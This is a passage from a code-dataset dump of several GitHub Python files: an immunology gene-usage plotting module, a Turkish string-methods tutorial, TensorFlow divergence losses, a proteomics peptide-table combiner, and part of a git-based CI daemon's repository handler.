data[:i]\n\n\n\t#Get read element quality\n\tdef getQuality(self, data):\n\t\ti = data.find(\"(\")\n\t\tif i == -1:\n\t\t\treturn None\n\t\tj = data.find(\")\")\n\t\treturn int(data[i+1:j])\n\n\n\t#Sorts and determines which chain elements need to be sorted and \n\tdef cleanData(self, datalist):\n\t\tfor i in range(0,len(datalist)):\n\t\t\t#Selects the best of the reads\n\t\t\tdatalist[i] = str(datalist[i])\n\t\t\tif(datalist[i] and datalist[i].find(\",\") != -1):\n\t\t\t\tdatalist[i] = self.getBestChain(datalist[i])\n\n\t\t\t#Creates tuple list object\n\t\t\tif(datalist[i].find(\"IGH\") != -1 and datalist[i].find(\"*\") != -1):\n\t\t\t\tdatalist[i] = [self.getChain(datalist[i]), self.getQuality(datalist[i])]\n\n\t\t\telse: #For the occasional \"nan\" value\n\t\t\t\tdatalist[i] = [\"\", 0]\n\n\n\t#returns the best quality read from the list element given\n\tdef getBestChain(self, data):\n\t\tchains = [x.strip() for x in data.split(',')] #splice data by commas, leaves individual reads and their quality\n\t\tindex = 1 #Compare any other chain qualities\n\t\tbest = self.getQuality(chains[0])\n\t\tfor x in chains[1:]:\n\t\t\tif self.getQuality(x) == best:\n\t\t\t\tindex += 1\n\n\t\treturn chains[random.randrange(0,index)]\n\n\t#Read usage bar plot from single list (v, d, j)\n\tdef barPlot(self, datalist, threshold, figname):\n\n\t\ttally = self.geneCount(datalist)\n\n\t\t#Limit the items plotted to those over 1% of the read mass\n\t\tgeneplot = defaultdict()\n\t\tfor g, n in tally.iteritems():\n\t\t\tif n > int(sum(tally.values())*threshold):\n\t\t\t\tgeneplot[g] = n\n\n\t\t#Get plotting values\n\t\tolist = OrderedDict(sorted(geneplot.items(),key=lambda t: t[0]))\n\t\tsumme = sum(olist.values())\n\t\tfreq = [float(x)/float(summe) for x in olist.values()]\n\t\t\n\t\t#Create plot\n\t\tfig = plt.figure()\n\t\twidth = .35\n\t\tind = np.arange(len(geneplot.keys()))\n\t\tplt.bar(ind, freq)\n\t\tplt.xticks(ind + width, geneplot.keys())\n\t\tlocs, labels = plt.xticks() \n\t\tplt.setp(labels, rotation=90)\n\t\tplt.show()\n\n\t\tfig.savefig(figname)\n\t\tprint(\"Saved bar plot as: \"+figname)\n\n\tdef Vgene_usage(self, **keyargs):\n\t\tprint(\"************************************************************\")\n\t\tprint(\"*****************CREATING V GENE USAGE PLOT*****************\")\n\t\tprint(\"************************************************************\\n\")\n\n\t\tth = 0\n\t\tname = \"Vgene_bar.png\"\n\t\tif('threshold' in keyargs):\n\t\t\tth = float(keyargs['threshold'])\n\t\tif('figname' in keyargs):\n\t\t\tname = keyargs['figname']+\"_\"+name\n\t\tself.barPlot(self.vlist, th, name)\n\n\tdef Jgene_usage(self):\n\t\tprint(\"************************************************************\")\n\t\tprint(\"*****************CREATING J GENE USAGE PLOT*****************\")\n\t\tprint(\"************************************************************\\n\")\n\n\t\tth = 0\n\t\tname = \"Jgene_bar.png\"\n\t\tif('threshold' in keyargs):\n\t\t\tth = float(keyargs['threshold'])\n\t\tif('figname' in keyargs):\n\t\t\tname = keyargs['figname']+\"_\"+name\n\t\tself.barPlot(self.jlist)\n\n\tdef Dgene_usage(self):\n\t\tprint(\"************************************************************\")\n\t\tprint(\"*****************CREATING D GENE USAGE PLOT*****************\")\n\t\tprint(\"************************************************************\\n\")\n\n\t\tth = 0\n\t\tname = \"Dgene_bar.png\"\n\t\tif('threshold' in keyargs):\n\t\t\tth = float(keyargs['threshold'])\n\t\tif('figname' in keyargs):\n\t\t\tname = keyargs['figname']+\"_\"+name\n\t\tself.barPlot(self.dlist)\n\n\t#Creates a heatmap graph of the V and J gene pairings\n\tdef V_J_heatmap(self, **keyargs):\n\t\tprint(\"************************************************************\")\n\t\tprint(\"*****************CREATING V/J GENE HEATMAP******************\")\n\t\tprint(\"************************************************************\\n\")\n\t\t\n\t\t#Getting which reads to check for\t\t\n\t\tvcount = self.geneCount(self.vlist)\n\t\tjcount = self.geneCount(self.jlist)\n\t\tvjlist = []\n\n\t\t#Checking for a threshold to clean data\n\t\tif('threshold' in keyargs):\n\t\t\tth = float(keyargs['threshold'])\n\t\t\tif(th >= 0 and th < 1):\n\t\t\t\tfor key, val in vcount.iteritems():\n\t\t\t\t\tif val <= int(sum(vcount.values())*th):\n\t\t\t\t\t\tdel vcount[key]\n\n\t\t\t\tfor key, val in jcount.iteritems():\n\t\t\t\t\tif val <= int(sum(jcount.values())*th):\n\t\t\t\t\t\tdel jcount[key]\n\n\n\t\tfor x in range(len(vcount)):\n\t\t\tvjlist.append([])\n\t\t\tfor y in range(len(jcount)):\n\t\t\t\tvjlist[x].append(0)\n\n\t\t#2D dict for storing gene hits\n\t\t#jaxis = {key:0 for key, val in jcount.iteritems()}\n\t\t#vjlist = {key: jaxis.copy() for key, val in vcount.iteritems()}\n\n\t\t#Checking for read hits in v and j list\n\t\tfor x in range(len(self.vlist)):\n\t\t\tvgene = self.vlist[x][0]\n\t\t\tjgene = self.jlist[x][0]\n\t\t\tif vgene in vcount.keys() and jgene in jcount.keys():\n\t\t\t\tvi = vcount.keys().index(vgene)\n\t\t\t\tji = jcount.keys().index(jgene)\n\t\t\telse:\n\t\t\t\tvi = -1\n\t\t\t\tji = -1\n\t\t\tif vgene != '' and jgene != '' and vi > -1 and ji >-1:\n\t\t\t\tvjlist[vi][ji] += 1\n\n\t\t#Make each number a percent of total reads in the v/j array\n\t\treadsum = sum(map(sum, vjlist))\n\t\tfor x in range(len(vcount)):\n\t\t\tfor y in range(len(jcount)):\n\t\t\t\tvjlist[x][y] = float(vjlist[x][y])/float(readsum)\n\t\t\n\t\tfig = plt.figure()\n\t\tplt.imshow(vjlist, interpolation='none', aspect=1/1, vmin=0, vmax=1)\n\t\tplt.yticks(range(len(vcount)), vcount.keys()) #some error about self._edgecolors == 'face'?\n\t\tplt.xticks(range(len(jcount)), jcount.keys())\n\t\tplt.jet()\n\t\tplt.colorbar()\n\t\tplt.show()\n\t\tif('figname' in keyargs):\n\t\t\tname = keyargs['figname']+\"_VJ_heatmap.png\"\n\t\t\tfig.savefig(keyargs['figname']+\"_VJ_heatmap.png\")\n\t\t\tprint('Saved heatmap plot as: '+name)\n\t\telse:\n\t\t\tfig.savefig(\"VJ_heatmap.png\")\n\t\t\tprint('Saved heatmap plot as: VJ_heatmap.png')","repo_name":"cnellington/BIGGDATA-Stats-Modules","sub_path":"annotationstats.py","file_name":"annotationstats.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11249933921","text":"website = \"http://www.sadikturan.com\"\ncourse = \"Python Kursu: Baştan Sona Python Programlama Rehberiniz (40 Saat)\"\n\n\n# 1 - ' Hello World ' karakter dizisinin baştaki ve sondaki boşluk karakterlerini silin.\n\nresult = ' Hello World '.strip()\nresult = ' Hello World '.lstrip()\nresult = ' Hello World '.rstrip()\n\n# ya da website ifadesinin başındaki karakterleri silelim www'den başlasın ve bize sadece www.sadikturan.com versin;\n\nresult = website.lstrip('/:pth')\n\n# 2 - 'www.sadikturan.com' dizinindeki sadikturan bilgisi dışındaki her karakteri silin.\n\nresult = 'www.sadikturan.com'.strip('w.moc')\n\n# 3 - 'course' karakter dizisinin tüm karakterlerini küçük harf yapın.\n\nresult = course.lower()\nresult = course.upper()\nresult = course.title()\n\n# 4 - 'website' dizininde kaç tane a karakteri vardır (count('a'))\n\nresult = website.count('a')\nresult = website.count('www')\nresult = website.count('www',0,10)\n\n# 5 - 'website' dizini www ile başlayıp com ile bitiyor mu?\n\nresult = website.startswith('www')\nresult = website.startswith('http')\nresult = website.endswith('com')\n\n# 6 - 'website' dizini içerisinde '.com' ifadesi var mı?\n\nresult = website.find('com')\nresult = website.find('com',0,10)\nresult = course.find('Python')\nresult = course.rfind('Python')\n\nresult = website.index('com') \nresult = website.rindex('com')\n# result = website.rindex('comm') # exception\n\n# 7 - 'course' dizini içerisindeki tüm karakterler alfabetik mi? (isalpha, isdigit)\n\nresult = course.isalpha()\nresult = 'Hello'.isalpha()\nresult = course.isdigit()\nresult = '123'.isdigit()\n\n# 8 - 'Contents' ifadesini satırda 50 karakter içerisine yerleştirip sağına soluna * ekleyiniz.\n\nresult = 'Contents'.center(50)\nresult = 'Contents'.center(50, '*')\nresult = 'Contents'.ljust(50, '*')\nresult = 'Contents'.rjust(50, '*')\n\n# 9 - 'course' karakter dizisindeki tüm boşluk karakterlerini '-' ile değiştiriniz.\n\nresult = course.replace(' ', '-')\nresult = course.replace(' ', '-',5)\nresult = course.replace(' ', '')\n\n# 10 - 'Hello World' karakter dizisinin 'World' ifadesini 'There' ile değiştiriniz.\n\nresult = 'Hello World'.replace('World', 'There')\n\n# 11 - 'course' karakter dizisini boşluk karakterlerinden ayırın.\n\nresult = course.split(' ')\n# result = result[2]\nresult = result[5]\n\n\nprint(result)\n\n\n","repo_name":"code-tamer/Library","sub_path":"Business/KARIYER/PYTHON/Python_Temelleri/string-methods-demo.py","file_name":"string-methods-demo.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34509981998","text":"import tensorflow as tf\nimport numpy as np\n\n#@tf.function\ndef f_star(g, loss_par): # f^*(g) = inf_x -f(x)\n threshold = 0.01\n if loss_par['f'] == 'KL': # f = xlogx -x +1\n return tf.math.exp(g)-1\n elif loss_par['f'] == 'alpha':\n alpha = loss_par['par'][0] # f = (x^alpha-1)/(alpha*(alpha-1))\n return 1/alpha*(1/(alpha-1)+tf.math.pow((alpha-1)*tf.nn.relu(g), alpha/(alpha-1)))\n elif loss_par['f'] == 'reverse_KL': # f = -logx\n max_g = tf.math.reduce_max(g)\n if max_g > threshold: # numerical stability\n return -1 - tf.math.log(-g+threshold)\n else:\n return -1 - tf.math.log(-g)\n elif loss_par['f'] == 'JS': # Jensen-Shannon\n max_exp_g = tf.math.reduce_max(tf.math.exp(g))\n if max_exp_g > 2.0-threshold: # numerical stability\n return -tf.math.log( 2 - tf.math.exp(g) + threshold )\n else:\n return -tf.math.log( 2 - tf.math.exp(g) )\n \n\n# --------------------------\n\ndef E_phi(x, x_label, N_x, mb_size_x, phi, W, b, NN_par):\n g1 = []\n if NN_par['N_conditions'] > 1: # indexing for x_label\n for n in range(int(N_x/mb_size_x)):\n g1.append(tf.math.reduce_sum(phi(x[n*mb_size_x:(n+1)*mb_size_x], x_label[n*mb_size_x:(n+1)*mb_size_x], W,b, NN_par)))\n if int(N_x/mb_size_x) * mb_size_x < N_x:\n g1.append( tf.reduce_sum(phi(x[int(N_x/mb_size_x):],x_label[n*mb_size_x:(n+1)*mb_size_x], W,b, NN_par)) )\n \n else: # not indexing for x_label=None\n for n in range(int(N_x/mb_size_x)):\n g1.append(tf.math.reduce_sum(phi(x[n*mb_size_x:(n+1)*mb_size_x], x_label, W,b, NN_par)))\n if int(N_x/mb_size_x) * mb_size_x < N_x:\n g1.append( tf.reduce_sum(phi(x[int(N_x/mb_size_x):],x_label, W,b, NN_par)) )\n \n return tf.add_n(g1)/N_x\n\n \ndef E_fstar_phi(x, x_label, N_x, mb_size_x, phi, nu, W, b, NN_par, loss_par):\n g2 = []\n if NN_par['N_conditions'] > 1: # indexing for x_label\n for n in range(int(N_x/mb_size_x)):\n if loss_par['formulation'] == 'DV':\n g2.append(tf.math.reduce_sum(tf.math.exp(phi(x[n*mb_size_x:(n+1)*mb_size_x], x_label[n*mb_size_x:(n+1)*mb_size_x], W,b, NN_par))))\n else: # LT\n g2.append(tf.math.reduce_sum(f_star(phi(x[n*mb_size_x:(n+1)*mb_size_x], x_label[n*mb_size_x:(n+1)*mb_size_x], W,b, NN_par)-nu, loss_par)))\n \n if int(N_x/mb_size_x) * mb_size_x < N_x:\n if loss_par['formulation'] == 'DV':\n g2.append( tf.reduce_sum(tf.math.exp(phi(x[int(N_x/mb_size_x):],x_label[int(N_x/mb_size_x):], W,b, NN_par))) )\n else: # LT\n g2.append( tf.reduce_sum(f_star(phi(x[int(N_x/mb_size_x):],x_label[int(N_x/mb_size_x):], W,b, NN_par)-nu, loss_par)) )\n\n else: # don't do indexing for x_label=None\n for n in range(int(N_x/mb_size_x)):\n if loss_par['formulation'] == 'DV':\n g2.append(tf.reduce_sum(tf.math.exp(phi(x[n*mb_size_x:(n+1)*mb_size_x],x_label, W,b, NN_par))))\n else: # LT\n g2.append(tf.reduce_sum(f_star(phi(x[n*mb_size_x:(n+1)*mb_size_x],x_label, W,b, NN_par)-nu, loss_par)))\n \n if int(N_x/mb_size_x) * mb_size_x < N_x:\n if loss_par['formulation'] == 'DV':\n g2.append( tf.reduce_sum(tf.math.exp(phi(x[int(N_x/mb_size_x):],x_label, W,b, NN_par))) )\n else: # LT\n g2.append( tf.reduce_sum(f_star(phi(x[int(N_x/mb_size_x):],x_label, W,b, NN_par)-nu, loss_par)) )\n \n return tf.add_n(g2)/N_x\n\n\ndef divergence_mb(phi, nu, P, Q, W, b, NN_par, loss_par, data_par):\n N_P, N_Q, mb_size_P, mb_size_Q = data_par['N_samples_P'], data_par['N_samples_Q'], data_par['mb_size_P'], data_par['mb_size_Q']\n P_label, Q_label = data_par['P_label'], data_par['Q_label']\n \n\n if loss_par['reverse'] == False: # D(P||Q)\n g1 = E_phi(P, P_label, N_P, mb_size_P, phi, W, b, NN_par)\n g2 = E_fstar_phi(Q, Q_label, N_Q, mb_size_Q, phi, nu, W, b, NN_par, loss_par)\n else: # D(Q||P)\n g1 = E_phi(Q, Q_label, N_Q, mb_size_Q, phi, W, b, NN_par)\n g2 = E_fstar_phi(P, P_label, N_P, mb_size_P, phi, nu, W, b, NN_par, loss_par)\n \n \n if loss_par['formulation'] == 'DV':\n return g1 - tf.math.log(g2)\n else:\n return g1 - g2 - nu\n \n \ndef wasserstein1_mb(phi, P, Q, W, b, NN_par, data_par):\n N_P, N_Q, mb_size_P, mb_size_Q = data_par['N_samples_P'], data_par['N_samples_Q'], data_par['mb_size_P'], data_par['mb_size_Q']\n P_label, Q_label = data_par['P_label'], data_par['Q_label']\n \n g1 = E_phi(P, P_label, N_P, mb_size_P, phi, W, b, NN_par)\n g2 = E_phi(Q, Q_label, N_Q, mb_size_Q, phi, W, b, NN_par)\n \n return g1 - g2\n \n\n\ndef calc_grad_phi(dP_dt):\n return np.mean(np.linalg.norm(dP_dt, axis=1))\n\n\n# @tf.function : might not be compatible to soft lipschitz constraint loss\ndef gradient_penalty(phi, P, Q, W, b, NN_par, data_par, lamda):\n P_label, Q_label = data_par['P_label'], data_par['Q_label']\n if NN_par['constraint'] == 'soft':\n L = NN_par['L']\n \n '''\n N_tot = min((200, P.shape[0], Q.shape[0]))\n N_P = int(N_tot*P.shape[0]/(P.shape[0]+Q.shape[0]))\n N_Q = int(N_tot*Q.shape[0]/(P.shape[0]+Q.shape[0]))\n r_P = np.random.randint(int(P.shape[0]/N_P))\n r_Q = np.random.randint(int(Q.shape[0]/N_Q))\n R = tf.concat([P[r_P*N_P:(r_P+1)*N_P], Q[r_Q*N_Q:(r_Q+1)*N_Q]], axis=0)\n \n if P_label != None:\n R_label = tf.concat([P_label[r_P*N_P:(r_P+1)*N_P], Q_label[r_Q*N_Q:(r_Q+1)*N_Q]], axis=0)\n else:\n R_label = None\n '''\n \n R = P\n R_label = P_label\n \n \n with tf.GradientTape(watch_accessed_variables=False) as tape:\n tape.watch(R)\n phi_R = phi(R,R_label, W,b,NN_par)\n dR = tape.gradient(phi_R, R)\n \n grad_phi = calc_grad_phi(dR)\n \n \n \n return tf.multiply(-lamda, tf.math.reduce_mean(tf.nn.relu(tf.math.square(dR/L)-1.0)))\n else:\n return tf.constant(0.0, dtype=tf.float32)\n\n","repo_name":"HyeminGu/Lipschitz_regularized_generative_particles_algorithm","sub_path":"scripts/GPA_NN/lib/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34762180199","text":"# python peptideGroupsCombine.py L:/promec/Animesh/Maria/peptides/peptides\n#wget https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\n#..\\python-3.11.0\\python.exe -m pip install pandas seaborn\n#..\\python-3.11.0\\python.exe peptideGroupsCombine.py ..\\..\\Aida\\sORF\\mqpar.K8R10.xml.1664621075.results\n# where peptides folder contains all experiments generated like like following:\n# tar cvzf pep.tgz mqpar.xml.1642586*/*/combined/txt/peptides.txt\n# mkdir peptides\n# cd peptides\n# tar xvzf ../pep.tgz\n#!pip3 install pandas pathlib --user\nimport pandas as pd\nimport sys\nfrom pathlib import Path\nif len(sys.argv) != 2:\n sys.exit(\"\\n\\nREQUIRED: pandas, pathlib; tested with Python 3.9.9 \\n\\nUSAGE: python peptideGroupsCombine.py \\n\\nExample\\n\\npython proteinGroupsCombineTTP.py L:\\promec\\Animesh\\Maria\\mqpar.xml.1623227664.results\")\npathFiles = Path(sys.argv[1])\n#pathFiles=Path(\"L:/OneDrive - NTNU/Aida/sORF/mqpar.K8R10.xml.1664621075.results/\")\nfileName = 'peptides.txt'\ntrainList = list(pathFiles.rglob(fileName))\n#trainList=[fN for fN in trainList if \"MGUS\" in str(fN)]\n#df = pd.concat(map(pd.read_table, trainList))\n# df.to_csv(pathFiles.with_suffix('.combinedT.txt'),sep=\"\\t\")#,rownames=FALSE)\n# f=trainList[0]\ndf = pd.DataFrame()\nfor f in trainList:\n if Path(f).stat().st_size > 0:\n peptideHits = pd.read_csv(f, low_memory=False, sep='\\t')\n print(f.parts)\n peptideHits.rename({'Ratio H/L normalized':'normH2L'},inplace=True,axis='columns')\n peptideHits=peptideHits[~peptideHits['Proteins'].str.contains(\"_HUMAN\",na=False)]\n peptideHits=peptideHits.assign(IDs=peptideHits['Leading razor protein'].str.split(';')).explode('IDs')\n peptideHits['pepID'] = peptideHits['Sequence']+';'+peptideHits['IDs']\n peptideHits['Name'] = f.parts[-4]\n df = pd.concat([df, peptideHits], sort=False)\nprint(df.columns)\nprint(df.head())\ndf = df.pivot_table(index='pepID', columns='Name',values='normH2L') # , aggfunc='median')\n# dfO=df\n# df.to_csv(pathFiles.with_suffix('.combined.txt'),sep=\"\\\")#,rownames=FALSE)\nplotcsv = pathFiles/(fileName+\".normH2L.histogram.svg\")\ndf.plot(kind='hist', alpha=0.5, bins=100).figure.savefig(plotcsv, dpi=100, bbox_inches=\"tight\")\ndf['Count'] = df.count(axis=1)\nprint(df.Count)\ndf = df.sort_values('Count', ascending=False)\nwriteScores = pathFiles/(fileName+\".Count.normH2L.csv\")\ndf.to_csv(writeScores) # .with_suffix('.combo.csv'))\nprint(\"Count Score in\\n\", writeScores, \"\\n\", plotcsv)\n#df.iloc[:, 0:1].plot(kind='hist')\n# writeDPpng=pathFiles/(fileName+\"Score.png\")\n#df.plot(kind='hist').figure.savefig(writeDPpng.absolute(),dpi=100,bbox_inches = \"tight\")\n#print(\"Histogram of Score in\",writeDPpng)\n# selecting for phosphorylated-peptides\n#df=df.filter(regex='79', axis=\"index\")\nimport numpy as np\nlog2df=-np.log2(df)\nprint(log2df.head())\nprint(log2df.columns)\nplotcsv = pathFiles/(fileName+\".log2normL2H.histogram.svg\")\nlog2df.plot(kind='hist', alpha=0.5, bins=100).figure.savefig(plotcsv, dpi=100, bbox_inches=\"tight\")\nwriteScores = pathFiles/(fileName+\".log2Count.normL2H.csv\")\nlog2df.to_csv(writeScores) # .with_suffix('.combo.csv'))\nprint(\"Count Score in\\n\", writeScores, \"\\n\", plotcsv)\n","repo_name":"animesh/scripts","sub_path":"peptideGroupsCombine.py","file_name":"peptideGroupsCombine.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"10772781785","text":"import collections\nfrom golem import ConfigParser\nfrom copy import copy\nimport datetime\nimport fnmatch\nimport getpass\nimport github3\nfrom golem import GolemError, OutputLogger, RunLogger, now\nimport hashlib\nimport json\nimport keyword\nimport logging\nimport os\nimport re\nimport requests\nimport shlex\nimport shutil\nimport socket\nimport traceback\nimport whelk\nimport golem.db\nimport sqlalchemy.sql as sql\n\nclass IniConfig(object):\n defaults = {}\n def __init__(self, config, section):\n if not hasattr(self, 'config'):\n self.config = {}\n for key in self.defaults:\n self._set(key, copy(self.defaults[key]))\n for key in config.options(section):\n self._set(key, config.get(section, key), config=True)\n\n def _set(self, key, val, config=False):\n if isinstance(val, basestring):\n if \"\\n\" in val:\n val = [shlex.split(x) for x in val.split(\"\\n\")]\n else:\n val = shlex.split(val)\n if len(val) == 1:\n val = val[0]\n if '.' in key:\n key1, key2 = key.split('.', 1)\n if keyword.iskeyword(key1):\n key1 += '_'\n if not hasattr(self, key1):\n setattr(self, key1, {})\n getattr(self, key1)[key2] = val\n if config:\n if key1 not in self.config:\n self.config[key1] = {}\n self.config[key1][key2] = val\n else:\n if keyword.iskeyword(key):\n key += '_'\n setattr(self, key, val)\n if config:\n self.config[key] = val\n\nclass Repository(IniConfig):\n defaults = {'upstream': None, 'reflogtype': None, 'actions': {}, 'notifiers': {}, 'remote': {}}\n def __init__(self, daemon, config, db):\n self.configfile = config\n self.mtime = os.path.getmtime(config)\n config = ConfigParser(config)\n IniConfig.__init__(self, config, 'repo')\n self.logger = logging.getLogger('golem.repo.' + self.name)\n self.logger.info(\"Parsing configuration for %s\" % self.name)\n self.path = os.path.join(daemon.repo_dir, self.name)\n self.repo_path = os.path.join(self.path, self.name + '.git')\n self.artefact_path = os.path.join(self.path, 'artefacts')\n self.shell = whelk.Shell(output_callback=OutputLogger(self.logger), run_callback=RunLogger(self.logger), cwd=self.repo_path)\n\n if hasattr(self, 'reflog_url'):\n self.reflogtype = 'http'\n self.reflogurl = self.reflog_url\n elif re.match('^https?://', self.upstream):\n self.reflogtype = 'http'\n self.reflogurl = self.upstream + '/logs/%REF%'\n elif self.upstream.startswith('file://'):\n self.reflogtype = 'file'\n self.upstream_path = self.upstream[7:]\n if self.git('config', 'core.bare', cwd=self.upstream_path).stdout.strip() != 'false':\n self.upstream_path = os.path.join(self.upstream_path, '.git')\n elif ':' in self.upstream:\n self.reflogtype = 'ssh'\n else:\n self.reflogtype = 'file'\n self.upstream_path = self.upstream\n if self.shell.git('config', 'core.bare', cwd=self.upstream).stdout.strip() != 'false':\n self.upstream_path = os.path.join(self.upstream_path, '.git')\n\n if re.match('^([a-z]+://|git@)github.com', self.upstream):\n self.reflogtype = 'github'\n\n if not self.reflogtype:\n raise GolemError(\"Don't know how to fetch reflogs for %s\" % self.name)\n\n for section in config.sections():\n if section.startswith('action:'):\n action = section[7:]\n self.logger.info(\" Adding action %s\" % action)\n self.actions[action] = Action(config, section)\n self.actions[action].artefact_path = os.path.join(self.artefact_path, action)\n self.actions[action].daemon = daemon\n self.actions[action].repo_name = self.name\n elif section.startswith('notify:'):\n nf = section[7:]\n self.logger.info(\" Adding notifier %s\" % nf)\n self.notifiers[nf] = Notifier(config, section)\n self.notifiers[nf].daemon = daemon\n self.notifiers[nf].repo_name = self.name\n\n changed = True\n while changed:\n changed = False\n for action in self.actions:\n for req in self.actions[action].requires:\n req = req[7:]\n\n # Backlog is \"inherited\" from the dependencies\n if self.actions[req].backlog < self.actions[action].backlog:\n changed = True\n self.actions[action].backlog = self.actions[req].backlog\n\n # Same for branches and tags. Intersection of all parents\n if self.actions[req].branches and not self.actions[action].branches:\n changed = True\n self.actions[action].branches = copy(self.actions[req].branches)\n elif self.actions[req].branches:\n for branch in self.actions[action].branches[:]:\n if branch not in self.actions[req].branches:\n changed = True\n self.actions[action].branches.remove(branch)\n if self.actions[req].tags and not self.actions[action].tags:\n changed = True\n self.actions[action].tags = copy(self.actions[req].tags)\n elif self.actions[req].tags:\n for tag in self.actions[action].tags[:]:\n if tag not in self.actions[req].tags:\n changed = True\n self.actions[action].tags.remove(tag)\n\n if not daemon.dummy:\n self.create_dirs()\n\n _r = golem.db.repository\n self.id = db.execute(sql.select([_r.c.id]).where(_r.c.name==self.name)).fetchone()\n self.id = self.id.id if self.id else db.execute(_r.insert().values(name=self.name)).inserted_primary_key[0]\n\n def last_commits(self, count, db):\n _c = golem.db.commit\n return db.execute(_c.select().where(_c.c.repository==self.id).order_by(sql.desc(_c.c.submit_time)).limit(count)).fetchall()\n\n def commit(self, ref, sha1, db):\n _c = golem.db.commit\n return db.execute(_c.select().where(sql.and_(_c.c.repository==self.id, _c.c.ref==ref, _c.c.sha1==sha1))).fetchone()\n\n def shortlog(self, old, new):\n from golem.web.encoding import decode\n return decode(self.shell.git('shortlog', \"--format=* [%h] %s\", '%s..%s' % (old, new), cwd=self.repo_path).stdout)\n\n def shortlog_html(self, old, new):\n log = self.shortlog(old, new).replace('&', '&').replace('<', '<').replace('>', '>')\n log = re.sub('\\[([0-9a-f]+)\\]', lambda match: '[%s]' % (self.commit_url.replace('%SHA1%', match.group(1)), match.group(1)), log)\n return log\n\n def dependencies(self):\n ret = []\n for src in self.actions.values():\n for dst in src.requires:\n ret.append([src.name, dst[7:]])\n return ret\n\n def actions_for(self, ref, sha1, db):\n _c = golem.db.commit\n _a = golem.db.action\n _f = golem.db.artefact\n cid = db.execute(_c.select('id').where(sql.and_(_c.c.ref==ref, _c.c.sha1==sha1))).fetchone()['id']\n data = db.execute(_a.select().where(_a.c.commit==cid).order_by(sql.asc(_a.c.start_time))).fetchall()\n data = [{'name': x.name, 'status': x.status, 'start_time': x.start_time, 'end_time': x.end_time, 'host': x.host,\n 'duration': x.duration, 'config': self.actions[x.name].config,\n 'files':[{'filename': y.filename, 'sha1': y.sha1} for y in db.execute(_f.select().where(_f.c.action==x.id)).fetchall()]} \n for x in data if x.name in self.actions]\n return data\n\n def create_dirs(self):\n if not os.path.exists(self.artefact_path):\n os.makedirs(self.artefact_path)\n\n def update(self):\n self.logger.info(\"Processing update for %s\" % self.name)\n if self.upstream:\n if not os.path.exists(self.repo_path):\n self.logger.info(\"Cloning %s\" % self.upstream)\n res = self.shell.git('clone', '--mirror', self.upstream, os.path.basename(self.repo_path), cwd=self.path)\n if res.returncode != 0:\n raise GolemError(\"Unable to clone repository: %s\" % res.stdout)\n self.git('config', 'core.logallrefupdates', 'false')\n self.git('config', 'remote.origin.fetch', 'refs/heads/*:refs/heads/*')\n else:\n if self.git('config', 'remote.origin.url').stdout.strip() != self.upstream:\n self.logger.warning(\"Updating origin url\")\n self.git('config', 'remote.origin.url', self.upstream)\n if self.git('config', 'remote.origin.fetch').stdout.strip() != '+refs/heads/*:refs/heads/*':\n self.git('config', 'remote.origin.fetch', '+refs/heads/*:refs/heads/*')\n self.logger.info(\"Fetching from %s\" % self.upstream)\n self.git('remote', 'prune', 'origin')\n self.git('fetch', 'origin')\n if self.remote:\n _remotes = self.git('remote').stdout.strip().split()\n for remote in self.remote:\n if remote not in _remotes:\n self.git('remote', 'add', remote, self.remote[remote])\n\n if self.git('config', 'remote.%s.url' % remote).stdout.strip() != self.remote[remote]:\n self.logger.warning(\"Updating %s url\" % remote)\n self.git('config', 'remote.%s.url' % remote, self.remote[remote])\n self.logger.info(\"Fetching from %s\" % self.remote[remote])\n try:\n self.git('remote', 'prune', remote)\n self.git('fetch', remote)\n except RuntimeError:\n # For secondary repos, exceptions are ok\n for line in traceback.format_exc().split('\\n'):\n self.logger.error(line)\n if self.git('ls-tree', 'HEAD', '.gitmodules').stdout.strip():\n # This needs a workdir, so have a temporary one\n wd = self.repo_path + '.work'\n if not os.path.exists(wd):\n os.mkdir(wd)\n env = {'GIT_DIR': self.repo_path, 'GIT_WORK_TREE': wd}\n self.git('checkout', 'HEAD', cwd=wd, env=env)\n self.git('reset', '--hard', 'HEAD', cwd=wd, env=env)\n self.git('submodule', 'init', cwd=wd, env=env)\n self.git('submodule', 'update', cwd=wd, env=env)\n shutil.rmtree(wd)\n self.update_reflog()\n\n def update_reflog(self):\n if self.reflogtype == 'file':\n self.shell.rsync(os.path.join(self.upstream_path, 'logs/'),\n os.path.join(self.repo_path, 'logs/'))\n elif self.reflogtype == 'ssh':\n self.shell.rsync('%s/logs/' % self.upstream, os.path.join(self.repo_path, 'logs/'))\n elif self.reflogtype == 'http':\n branches = self.git('for-each-ref', '--format', '%(refname:short)', 'refs/heads').stdout.splitlines()\n for branch in branches:\n logpath = os.path.join(self.repo_path, 'logs', 'refs', 'heads', branch)\n if not os.path.exists(os.path.dirname(logpath)):\n os.makedirs(os.path.dirname(logpath))\n res = requests.get(self.reflogurl.replace('%REF%', 'refs/heads/%s' % branch))\n if res.status_code != 200:\n raise GolemError(\"Unable to fetch reflog for branch: %s\" % r.status_code)\n with open(logpath, 'w') as fd:\n fd.write(res.text.encode('utf-8'))\n elif self.reflogtype == 'github':\n gh = github()\n BOGUS_SHA1 = '1' * 40\n user, repo = self.upstream.rsplit('/', 3)[-2:]\n # For ssh urls\n if ':' in user:\n user = user[user.find(':')+1:]\n if repo.endswith('.git'):\n repo = repo[:-4]\n repo = gh.repository(user, repo)\n branches = collections.defaultdict(list)\n heads = {}\n\n for event in repo.iter_events(number=300):\n if event.type == 'CreateEvent' and event.payload['ref_type'] == 'branch':\n # log --reverse -n1 does not what I expect: it outputs only the *last*\n # commit. I want the first.\n ret = self.shell.git('log', '--pretty=%H', '%s..%s' % (event.payload['master_branch'], event.payload['ref']), '--')\n if ret.returncode != 0:\n # Branch no longer exists, so we don't care\n continue\n if not ret.stdout.strip():\n ret = self.shell.git('rev-parse', event.payload['ref'])\n sha = ret.stdout.rsplit('\\n', 2)[-1]\n push = (\n '0' * 40,\n sha,\n cache(gh.user, event.actor.login).name,\n '<%s@github>' % event.actor.login,\n 